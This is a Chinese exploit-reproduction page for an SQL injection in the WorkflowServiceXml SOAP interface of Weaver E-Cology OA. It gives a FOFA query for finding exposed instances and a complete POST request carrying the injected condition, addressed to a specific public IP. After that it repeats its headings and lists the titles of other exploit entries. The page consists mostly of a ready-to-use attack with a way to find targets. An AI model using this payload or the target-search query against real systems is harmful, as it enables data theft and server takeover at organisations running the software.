F6-10泛微-E-Cology-SQL

漏洞描述：

泛微E-Cology OA协同商务系统/services/WorkflowServiceXml接口存在SQL注入漏洞，攻击者可以通过漏洞获取服务器内敏感信息导致信息泄露，甚至通过漏洞写入木马病毒获取服务器权限。

fofa语法：

app=“泛微-OA（e-cology）”

漏洞复现：

payload：

POST /services%20/WorkflowServiceXml HTTP/1.1
Host: 122.9.110.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: text/xml
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"> 
  <soapenv:Header/>
    <soapenv:Body>
      <web:getHendledWorkflowRequestList>
        <web:in0>1</web:in0>
        <web:in1>1</web:in1>
        <web:in2>1</web:in2>
        <web:in3>1</web:in3>
        <web:in4>
          <web:string>1=1 AND 2=2</web:string>
        </web:in4>
        </web:getHendledWorkflowRequestList>
    </soapenv:Body>
</soapenv:Envelope>

效果图：

Menu

Share

F6-10泛微-E-Cology-SQL

F6-10泛微-E-Cology-SQL

漏洞描述：

fofa语法：

漏洞复现：

Comment

Z22-1正方-移动信息服务管理系统-任意文件上传

Z20-1ZoneMinder--SQL

Z17-2紫光-电子档案管理系统-InformationLeakage

P5-2平升-电子水库监测管理平台-SQL

M3-2明源云-ERP系统接口管家-任意文件上传

Y4-21用友-NC-XXE

Y4-18用友-NC-XXE

Q14-1群杰-印章物联网管理平台-PermissionAC

J26-1极简云-网络验证系统-任意文件读取

J17-3金蝶-Apusic应用服务器-JNDI注入